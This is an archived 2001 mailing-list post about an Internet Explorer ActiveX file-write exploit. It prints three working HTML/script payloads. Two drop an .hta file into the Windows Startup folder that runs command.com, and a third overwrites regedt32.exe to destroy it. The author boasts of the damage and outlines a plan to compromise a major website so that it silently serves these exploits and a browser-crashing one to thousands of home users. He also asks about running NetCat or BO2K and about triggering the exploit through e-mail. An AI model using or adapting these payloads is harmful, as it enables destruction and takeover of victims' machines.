Okay, I haven't seen any interesting observations yet as to the value of this exploit or the potential damage it contains. This exploit allows for the OVERWRITING of any application you choose, WITHOUT the system objecting. I haven't tested it against anything specific yet, except for a trial run against Regedit. The key is to select a specific path in which a known file resides, such as C:\\winnt\system32 and then you give the .hta file the name of the file you want overwritten. Here's the code originally included; <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" > </object> <SCRIPT> scr.Reset(); scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta"; scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert( 'Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>"; scr.write(); </SCRIPT> </object> If you wanted this to run against an NT machine then, <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" ></object><script> scr.Reset(); scr.Path="C:\\WINNT\\Profiles\\All Users\\Start Menu\\Programs\\Startup\\guninski.hta"; scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert( 'Screw Denise Richards, Debbie Johnson r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>"; scr.write(); </script> For all those arguing about figuring out which user it should be addressed to, the answer is to "All Users" Now watch as I modify this to destroy Regedit 32 <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" ></object><script> scr.Reset(); scr.Path="C:\\WINNT\\System32\\regedt32.exe"; scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert( 'Screw Denise Richards, Debbie Johnson r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>"; scr.write(); </script> As you can see the simple malicious damage is unprecedented, good luck trying to figure out what's happened when your computers crashed, permanently. Now let me give you a simple scenario for a real-world example. Let's say a Cracker, we'll call him Ahab, decides to take over ABC or Symantec's web page, not that difficult to imagine. Without ever breaking the firewall, all he has to do is modify the web page. Now usually they detect the obscene message within minutes taking it offline, imagine though if Ahab just modified the source, he could include in it both Active X exploits, for NT and 98, in addition he could add to the source an insturction to change to another web page in 5 seconds, a page he's added to InetPub. This new page would include the even more recent exploit that crashes IE5 with a form field overflow. Imagine how long it would take for anyone to realize that the web page had been hacked, their computers would freeze everytime they went there for no apparent reason (the new exploit doesn't display the page that froze your browser only the page before) All of those home users, the thousands of hits a day they'd be getting, would simply connect to the site, get their system Kernal overwritten and have their browser crashed, forcing a restart for the home user. Does everyone see the potential damage here? Has anyone figure out if an arbitrary binary could be executed? Such as Net Cat or BO2K? Also, I understand outlook executes this code immediatley, is it possible that this same code could cause someone's system to crash merely by opening the E-Mail? Seth Georgion
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:59:43 PDT